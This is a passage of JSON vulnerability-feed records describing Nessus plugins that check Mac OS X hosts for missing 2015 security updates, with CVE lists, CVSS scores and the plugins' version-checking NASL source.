"CVE-2015-5933", "CVE-2015-5934", "CVE-2015-5935", "CVE-2015-5936", "CVE-2015-5937", "CVE-2015-5938", "CVE-2015-5939", "CVE-2015-5940", "CVE-2015-5942", "CVE-2015-5943", "CVE-2015-5944", "CVE-2015-5945", "CVE-2015-6563", "CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838", "CVE-2015-6974", "CVE-2015-6975", "CVE-2015-6976", "CVE-2015-6977", "CVE-2015-6978", "CVE-2015-6980", "CVE-2015-6983", "CVE-2015-6984", "CVE-2015-6985", "CVE-2015-6987", "CVE-2015-6988", "CVE-2015-6989", "CVE-2015-6990", "CVE-2015-6991", "CVE-2015-6992", "CVE-2015-6993", "CVE-2015-6994", "CVE-2015-6995", "CVE-2015-6996", "CVE-2015-7003", "CVE-2015-7006", "CVE-2015-7007", "CVE-2015-7008", "CVE-2015-7009", "CVE-2015-7010", "CVE-2015-7015", "CVE-2015-7016", "CVE-2015-7017", "CVE-2015-7018", "CVE-2015-7019", "CVE-2015-7020", "CVE-2015-7021", "CVE-2015-7023", "CVE-2015-7024", "CVE-2015-7035"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "9324.PRM", "href": "https://www.tenable.com/plugins/nnm/9324", "sourceData": "Binary data 9324.prm", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T15:02:26", "description": "The remote host is running a version of Mac OS X that is 10.9.5 or later but prior to 10.11.1 It is, therefore, affected by multiple vulnerabilities in the following components :\n\n - Accelerate Framework (CVE-2015-5940)\n\n - apache_mod_php (CVE-2015-0235, CVE-2015-0273, CVE-2015-6834, CVE-2015-6835, CVE-2015-6836, CVE-2015-6837, CVE-2015-6838)\n\n - ATS (CVE-2015-6985)\n\n - Audio (CVE-2015-5933, CVE-2015-5934, CVE-2015-7003)\n\n - Bom (CVE-2015-7006)\n\n - CFNetwork (CVE-2015-7023)\n\n - configd (CVE-2015-7015)\n\n - CoreGraphics (CVE-2015-5925, CVE-2015-5926)\n\n - CoreText (CVE-2015-5944, CVE-2015-6975, CVE-2015-6992, CVE-2015-7017)\n\n - Directory Utility (CVE-2015-6980)\n\n - Disk Images (CVE-2015-6995)\n\n - EFI (CVE-2015-7035)\n\n - File Bookmark (CVE-2015-6987)\n\n - FontParser 
(CVE-2015-5927, CVE-2015-5942, CVE-2015-6976, CVE-2015-6977, CVE-2015-6978, CVE-2015-6990, CVE-2015-6991, CVE-2015-6993, CVE-2015-7008, CVE-2015-7009, CVE-2015-7010, CVE-2015-7018)\n\n - Grand Central Dispatch (CVE-2015-6989)\n\n - Graphics Drivers (CVE-2015-7019, CVE-2015-7020, CVE-2015-7021)\n\n - ImageIO (CVE-2015-5935, CVE-2015-5936, CVE-2015-5937, CVE-2015-5938, CVE-2015-5939)\n\n - IOAcceleratorFamily (CVE-2015-6996)\n\n - IOHIDFamily (CVE-2015-6974)\n\n - Kernel (CVE-2015-5932, CVE-2015-6988, CVE-2015-6994)\n\n - libarchive (CVE-2015-6984)\n\n - MCX Application Restrictions (CVE-2015-7016)\n\n - Net-SNMP (CVE-2014-3565, CVE-2012-6151)\n\n - OpenGL (CVE-2015-5924)\n\n - OpenSSH (CVE-2015-6563)\n\n - Sandbox (CVE-2015-5945)\n\n - Script Editor (CVE-2015-7007)\n\n - Security (CVE-2015-6983, CVE-2015-7024)\n\n - SecurityAgent (CVE-2015-5943)\n\nNote that successful exploitation of the most serious issues can result in arbitrary code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-10-29T00:00:00", "type": "nessus", "title": "Mac OS X < 10.11.1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": 
false}, "cvelist": ["CVE-2012-6151", "CVE-2014-3565", "CVE-2015-0235", "CVE-2015-0273", "CVE-2015-5924", "CVE-2015-5925", "CVE-2015-5926", "CVE-2015-5927", "CVE-2015-5932", "CVE-2015-5933", "CVE-2015-5934", "CVE-2015-5935", "CVE-2015-5936", "CVE-2015-5937", "CVE-2015-5938", "CVE-2015-5939", "CVE-2015-5940", "CVE-2015-5942", "CVE-2015-5943", "CVE-2015-5944", "CVE-2015-5945", "CVE-2015-6563", "CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838", "CVE-2015-6974", "CVE-2015-6975", "CVE-2015-6976", "CVE-2015-6977", "CVE-2015-6978", "CVE-2015-6980", "CVE-2015-6983", "CVE-2015-6984", "CVE-2015-6985", "CVE-2015-6987", "CVE-2015-6988", "CVE-2015-6989", "CVE-2015-6990", "CVE-2015-6991", "CVE-2015-6992", "CVE-2015-6993", "CVE-2015-6994", "CVE-2015-6995", "CVE-2015-6996", "CVE-2015-7003", "CVE-2015-7006", "CVE-2015-7007", "CVE-2015-7008", "CVE-2015-7009", "CVE-2015-7010", "CVE-2015-7015", "CVE-2015-7016", "CVE-2015-7017", "CVE-2015-7018", "CVE-2015-7019", "CVE-2015-7020", "CVE-2015-7021", "CVE-2015-7023", "CVE-2015-7024", "CVE-2015-7035"], "modified": "2018-07-14T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "MACOSX_10_11_1.NASL", "href": "https://www.tenable.com/plugins/nessus/86654", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86654);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/07/14 1:59:36\");\n\n script_cve_id(\n \"CVE-2012-6151\",\n \"CVE-2014-3565\",\n \"CVE-2015-0235\",\n \"CVE-2015-0273\",\n \"CVE-2015-5924\",\n \"CVE-2015-5925\",\n \"CVE-2015-5926\",\n \"CVE-2015-5927\",\n \"CVE-2015-5932\",\n \"CVE-2015-5933\",\n \"CVE-2015-5934\",\n \"CVE-2015-5935\",\n \"CVE-2015-5936\",\n \"CVE-2015-5937\",\n \"CVE-2015-5938\",\n \"CVE-2015-5939\",\n \"CVE-2015-5940\",\n \"CVE-2015-5942\",\n \"CVE-2015-5943\",\n \"CVE-2015-5944\",\n \"CVE-2015-5945\",\n \"CVE-2015-6563\",\n \"CVE-2015-6834\",\n \"CVE-2015-6835\",\n \"CVE-2015-6836\",\n 
\"CVE-2015-6837\",\n \"CVE-2015-6838\",\n \"CVE-2015-6974\",\n \"CVE-2015-6975\",\n \"CVE-2015-6976\",\n \"CVE-2015-6977\",\n \"CVE-2015-6978\",\n \"CVE-2015-6980\",\n \"CVE-2015-6983\",\n \"CVE-2015-6984\",\n \"CVE-2015-6985\",\n \"CVE-2015-6987\",\n \"CVE-2015-6988\",\n \"CVE-2015-6989\",\n \"CVE-2015-6990\",\n \"CVE-2015-6991\",\n \"CVE-2015-6992\",\n \"CVE-2015-6993\",\n \"CVE-2015-6994\",\n \"CVE-2015-6995\",\n \"CVE-2015-6996\",\n \"CVE-2015-7003\",\n \"CVE-2015-7006\",\n \"CVE-2015-7007\",\n \"CVE-2015-7008\",\n \"CVE-2015-7009\",\n \"CVE-2015-7010\",\n \"CVE-2015-7015\",\n \"CVE-2015-7016\",\n \"CVE-2015-7017\",\n \"CVE-2015-7018\",\n \"CVE-2015-7019\",\n \"CVE-2015-7020\",\n \"CVE-2015-7021\",\n \"CVE-2015-7023\",\n \"CVE-2015-7024\",\n \"CVE-2015-7035\"\n );\n script_bugtraq_id(\n 64048,\n 69477,\n 72325,\n 72701,\n 74971,\n 76317,\n 76644,\n 76649,\n 76733,\n 76734,\n 76738,\n 77263,\n 77265,\n 77266,\n 77270\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2015-10-21-4\");\n\n script_name(english:\"Mac OS X < 10.11.1 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Mac OS X.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a Mac OS X update that fixes multiple\nsecurity vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Mac OS X that is 10.9.5 or\nlater but prior to 10.11.1 It is, therefore, affected by multiple\nvulnerabilities in the following components :\n\n - Accelerate Framework (CVE-2015-5940)\n\n - apache_mod_php (CVE-2015-0235, CVE-2015-0273,\n CVE-2015-6834, CVE-2015-6835, CVE-2015-6836,\n CVE-2015-6837, CVE-2015-6838)\n\n - ATS (CVE-2015-6985)\n\n - Audio (CVE-2015-5933, CVE-2015-5934, CVE-2015-7003)\n\n - Bom (CVE-2015-7006)\n\n - CFNetwork (CVE-2015-7023)\n\n - configd (CVE-2015-7015)\n\n - CoreGraphics (CVE-2015-5925, CVE-2015-5926)\n\n - CoreText (CVE-2015-5944, CVE-2015-6975, CVE-2015-6992,\n 
CVE-2015-7017)\n\n - Directory Utility (CVE-2015-6980)\n\n - Disk Images (CVE-2015-6995)\n\n - EFI (CVE-2015-7035)\n\n - File Bookmark (CVE-2015-6987)\n\n - FontParser (CVE-2015-5927, CVE-2015-5942, CVE-2015-6976,\n CVE-2015-6977, CVE-2015-6978, CVE-2015-6990,\n CVE-2015-6991, CVE-2015-6993, CVE-2015-7008,\n CVE-2015-7009, CVE-2015-7010, CVE-2015-7018)\n\n - Grand Central Dispatch (CVE-2015-6989)\n\n - Graphics Drivers (CVE-2015-7019, CVE-2015-7020,\n CVE-2015-7021)\n\n - ImageIO (CVE-2015-5935, CVE-2015-5936, CVE-2015-5937,\n CVE-2015-5938, CVE-2015-5939)\n\n - IOAcceleratorFamily (CVE-2015-6996)\n\n - IOHIDFamily (CVE-2015-6974)\n\n - Kernel (CVE-2015-5932, CVE-2015-6988, CVE-2015-6994)\n\n - libarchive (CVE-2015-6984)\n\n - MCX Application Restrictions (CVE-2015-7016)\n\n - Net-SNMP (CVE-2014-3565, CVE-2012-6151)\n\n - OpenGL (CVE-2015-5924)\n\n - OpenSSH (CVE-2015-6563)\n\n - Sandbox (CVE-2015-5945)\n\n - Script Editor (CVE-2015-7007)\n\n - Security (CVE-2015-6983, CVE-2015-7024)\n\n - SecurityAgent (CVE-2015-5943)\n\nNote that successful exploitation of the most serious issues can\nresult in arbitrary code execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT205375\");\n # https://lists.apple.com/archives/security-announce/2015/Oct/msg00005.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7e01da3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Mac OS X 10.11.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n 
script_set_attribute(attribute:\"metasploit_name\", value:'Safari User-Assisted Applescript Exec Attack');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/09/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/10/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/OS\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os)\n{\n os = get_kb_item_or_exit(\"Host/OS\");\n if (\"Mac OS X\" >!< os) audit(AUDIT_OS_NOT, \"Mac OS X\");\n\n c = get_kb_item(\"Host/OS/Confidence\");\n if (c <= 70) exit(1, \"Cannot determine the host's OS with sufficient confidence.\");\n}\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X\");\n\nmatch = eregmatch(pattern:\"Mac OS X ([0-9]+(\\.[0-9]+)+)\", string:os);\nif (isnull(match)) exit(1, \"Failed to parse the Mac OS X version ('\" + os + \"').\");\n\nversion = match[1];\n\nif (\n version !~ \"^10\\.11([^0-9]|$)\"\n) audit(AUDIT_OS_NOT, \"Mac OS X 10.11 or later\", \"Mac OS X \"+version);\n\nfixed_version = \"10.11.1\";\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n if (report_verbosity > 0)\n {\n report = '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version +\n '\\n';\n security_hole(port:0, extra:report);\n 
}\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected since it is running Mac OS X \"+version+\".\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:57:10", "description": "The remote host is running a version of Mac OS X 10.10.x that is prior to 10.10.4. It is, therefore, affected multiple vulnerabilities in the following components :\n\n - Admin Framework\n - afpserver\n - apache\n - AppleFSCompression\n - AppleGraphicsControl\n - AppleThunderboltEDMService\n - ATS\n - Bluetooth\n - Certificate Trust Policy\n - CFNetwork HTTPAuthentication\n - CoreText\n - coreTLS\n - DiskImages\n - Display Drivers\n - EFI\n - FontParser\n - Graphics Driver\n - ImageIO\n - Install Framework Legacy\n - Intel Graphics Driver\n - IOAcceleratorFamily\n - IOFireWireFamily\n - Kernel\n - kext tools\n - Mail\n - ntfs\n - ntp\n - OpenSSL\n - QuickTime\n - Security\n - Spotlight\n - SQLite\n - System Stats\n - TrueTypeScaler\n - zip\n\nNote that successful exploitation of the most serious issues can result in arbitrary code execution.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 3.7, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2015-07-01T00:00:00", "type": "nessus", "title": "Mac OS X 10.10.x < 10.10.4 Multiple Vulnerabilities (GHOST) (Logjam)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 
10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0209", "CVE-2015-0235", "CVE-2015-0273", "CVE-2015-0286", "CVE-2015-0287", "CVE-2015-0288", "CVE-2015-0289", "CVE-2015-0293", "CVE-2015-1157", "CVE-2015-1798", "CVE-2015-1799", "CVE-2015-3661", "CVE-2015-3662", "CVE-2015-3663", "CVE-2015-3666", "CVE-2015-3667", "CVE-2015-3668", "CVE-2015-3671", "CVE-2015-3672", "CVE-2015-3673", "CVE-2015-3674", "CVE-2015-3675", "CVE-2015-3676", "CVE-2015-3677", "CVE-2015-3678", "CVE-2015-3679", "CVE-2015-3680", "CVE-2015-3681", "CVE-2015-3682", "CVE-2015-3683", "CVE-2015-3684", "CVE-2015-3685", "CVE-2015-3686", "CVE-2015-3687", "CVE-2015-3688", "CVE-2015-3689", "CVE-2015-3690", "CVE-2015-3691", "CVE-2015-3692", "CVE-2015-3693", "CVE-2015-3694", "CVE-2015-3695", "CVE-2015-3696", "CVE-2015-3697", "CVE-2015-3698", "CVE-2015-3699", "CVE-2015-3700", "CVE-2015-3701", "CVE-2015-3702", "CVE-2015-3703", "CVE-2015-3704", "CVE-2015-3705", "CVE-2015-3706", "CVE-2015-3707", "CVE-2015-3708", "CVE-2015-3709", "CVE-2015-3710", "CVE-2015-3711", "CVE-2015-3712", "CVE-2015-3713", "CVE-2015-3714", "CVE-2015-3715", "CVE-2015-3716", "CVE-2015-3717", "CVE-2015-3718", "CVE-2015-3719", "CVE-2015-3720", "CVE-2015-3721", "CVE-2015-4000", "CVE-2015-7036"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "MACOSX_10_10_4.NASL", "href": "https://www.tenable.com/plugins/nessus/84488", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84488);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2015-0209\",\n \"CVE-2015-0235\",\n \"CVE-2015-0273\",\n \"CVE-2015-0286\",\n \"CVE-2015-0287\",\n \"CVE-2015-0288\",\n \"CVE-2015-0289\",\n \"CVE-2015-0293\",\n \"CVE-2015-1157\",\n 
\"CVE-2015-1798\",\n \"CVE-2015-1799\",\n \"CVE-2015-3661\",\n \"CVE-2015-3662\",\n \"CVE-2015-3663\",\n \"CVE-2015-3666\",\n \"CVE-2015-3667\",\n \"CVE-2015-3668\",\n \"CVE-2015-3671\",\n \"CVE-2015-3672\",\n \"CVE-2015-3673\",\n \"CVE-2015-3674\",\n \"CVE-2015-3675\",\n \"CVE-2015-3676\",\n \"CVE-2015-3677\",\n \"CVE-2015-3678\",\n \"CVE-2015-3679\",\n \"CVE-2015-3680\",\n \"CVE-2015-3681\",\n \"CVE-2015-3682\",\n \"CVE-2015-3683\",\n \"CVE-2015-3684\",\n \"CVE-2015-3685\",\n \"CVE-2015-3686\",\n \"CVE-2015-3687\",\n \"CVE-2015-3688\",\n \"CVE-2015-3689\",\n \"CVE-2015-3690\",\n \"CVE-2015-3691\",\n \"CVE-2015-3692\",\n \"CVE-2015-3693\",\n \"CVE-2015-3694\",\n \"CVE-2015-3695\",\n \"CVE-2015-3696\",\n \"CVE-2015-3697\",\n \"CVE-2015-3698\",\n \"CVE-2015-3699\",\n \"CVE-2015-3700\",\n \"CVE-2015-3701\",\n \"CVE-2015-3702\",\n \"CVE-2015-3703\",\n \"CVE-2015-3704\",\n \"CVE-2015-3705\",\n \"CVE-2015-3706\",\n \"CVE-2015-3707\",\n \"CVE-2015-3708\",\n \"CVE-2015-3709\",\n \"CVE-2015-3710\",\n \"CVE-2015-3711\",\n \"CVE-2015-3712\",\n \"CVE-2015-3713\",\n \"CVE-2015-3714\",\n \"CVE-2015-3715\",\n \"CVE-2015-3716\",\n \"CVE-2015-3717\",\n \"CVE-2015-3718\",\n \"CVE-2015-3719\",\n \"CVE-2015-3720\",\n \"CVE-2015-3721\",\n \"CVE-2015-4000\",\n \"CVE-2015-7036\"\n );\n script_bugtraq_id(\n 72325,\n 72701,\n 73225,\n 73227,\n 73231,\n 73232,\n 73237,\n 73239,\n 73950,\n 73951,\n 74733\n );\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2015-06-30-2\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n\n script_name(english:\"Mac OS X 10.10.x < 10.10.4 Multiple Vulnerabilities (GHOST) (Logjam)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a Mac OS X update that fixes multiple\nsecurity vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Mac OS X 10.10.x that is prior\nto 10.10.4. 
It is, therefore, affected multiple vulnerabilities in the\nfollowing components :\n\n - Admin Framework\n - afpserver\n - apache\n - AppleFSCompression\n - AppleGraphicsControl\n - AppleThunderboltEDMService\n - ATS\n - Bluetooth\n - Certificate Trust Policy\n - CFNetwork HTTPAuthentication\n - CoreText\n - coreTLS\n - DiskImages\n - Display Drivers\n - EFI\n - FontParser\n - Graphics Driver\n - ImageIO\n - Install Framework Legacy\n - Intel Graphics Driver\n - IOAcceleratorFamily\n - IOFireWireFamily\n - Kernel\n - kext tools\n - Mail\n - ntfs\n - ntp\n - OpenSSL\n - QuickTime\n - Security\n - Spotlight\n - SQLite\n - System Stats\n - TrueTypeScaler\n - zip\n\nNote that successful exploitation of the most serious issues can\nresult in arbitrary code execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-ca/HT204942\");\n # http://lists.apple.com/archives/security-announce/2015/Jun/msg00002.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?956357d4\");\n # https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7a6ddbd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Mac OS X 10.10.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0235\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apple OS X Entitlements Rootpipe Privilege Escalation');\n 
script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/06/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/OS\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os)\n{\n os = get_kb_item_or_exit(\"Host/OS\");\n if (\"Mac OS X\" >!< os) audit(AUDIT_OS_NOT, \"Mac OS X\");\n\n c = get_kb_item(\"Host/OS/Confidence\");\n if (c <= 70) exit(1, \"Can't determine the host's OS with sufficient confidence.\");\n}\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X\");\n\nmatch = eregmatch(pattern:\"Mac OS X ([0-9]+(\\.[0-9]+)+)\", string:os);\nif (isnull(match)) exit(1, \"Failed to parse the Mac OS X version ('\" + os + \"').\");\n\nversion = match[1];\nif (!ereg(pattern:\"^10\\.10([^0-9]|$)\", string:version)) audit(AUDIT_OS_NOT, \"Mac OS X 10.10\", \"Mac OS X \"+version);\n\nfixed_version = \"10.10.4\";\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n if (report_verbosity > 0)\n {\n report 
= '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected since it is running Mac OS X \"+version+\".\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:57:26", "description": "The remote host is running a version of Mac OS X 10.8.5 or 10.9.5 that is missing Security Update 2015-005. It is, therefore, affected multiple vulnerabilities in the following components :\n\n - Admin Framework\n - afpserver\n - apache\n - AppleFSCompression\n - AppleGraphicsControl\n - AppleThunderboltEDMService\n - ATS\n - Bluetooth\n - Certificate Trust Policy\n - CFNetwork HTTPAuthentication\n - CoreText\n - coreTLS\n - DiskImages\n - Display Drivers\n - EFI\n - FontParser\n - Graphics Driver\n - ImageIO\n - Install Framework Legacy\n - Intel Graphics Driver\n - IOAcceleratorFamily\n - IOFireWireFamily\n - Kernel\n - kext tools\n - Mail\n - ntfs\n - ntp\n - OpenSSL\n - QuickTime\n - Security\n - Spotlight\n - SQLite\n - System Stats\n - TrueTypeScaler\n - zip\n\nNote that successful exploitation of the most serious issues can result in arbitrary code execution.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 3.7, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2015-07-01T00:00:00", "type": "nessus", "title": "Mac OS X Multiple Vulnerabilities (Security Update 2015-005) (GHOST) (Logjam)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0209", "CVE-2015-0235", "CVE-2015-0273", "CVE-2015-0286", "CVE-2015-0287", "CVE-2015-0288", "CVE-2015-0289", "CVE-2015-0293", "CVE-2015-1157", "CVE-2015-1798", "CVE-2015-1799", "CVE-2015-3661", "CVE-2015-3662", "CVE-2015-3663", "CVE-2015-3666", "CVE-2015-3667", "CVE-2015-3668", "CVE-2015-3671", "CVE-2015-3672", "CVE-2015-3673", "CVE-2015-3674", "CVE-2015-3675", "CVE-2015-3676", "CVE-2015-3677", "CVE-2015-3678", "CVE-2015-3679", "CVE-2015-3680", "CVE-2015-3681", "CVE-2015-3682", "CVE-2015-3683", "CVE-2015-3684", "CVE-2015-3685", "CVE-2015-3686", "CVE-2015-3687", "CVE-2015-3688", "CVE-2015-3689", "CVE-2015-3690", "CVE-2015-3691", "CVE-2015-3692", "CVE-2015-3693", "CVE-2015-3694", "CVE-2015-3695", "CVE-2015-3696", "CVE-2015-3697", "CVE-2015-3698", "CVE-2015-3699", "CVE-2015-3700", "CVE-2015-3701", "CVE-2015-3702", "CVE-2015-3703", "CVE-2015-3704", "CVE-2015-3705", "CVE-2015-3706", "CVE-2015-3707", "CVE-2015-3708", "CVE-2015-3709", "CVE-2015-3710", "CVE-2015-3711", "CVE-2015-3712", "CVE-2015-3713", "CVE-2015-3714", "CVE-2015-3715", "CVE-2015-3716", "CVE-2015-3717", "CVE-2015-3718", "CVE-2015-3719", "CVE-2015-3720", "CVE-2015-3721", "CVE-2015-4000"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "MACOSX_SECUPD2015-005.NASL", "href": "https://www.tenable.com/plugins/nessus/84489", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84489);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2015-0209\",\n 
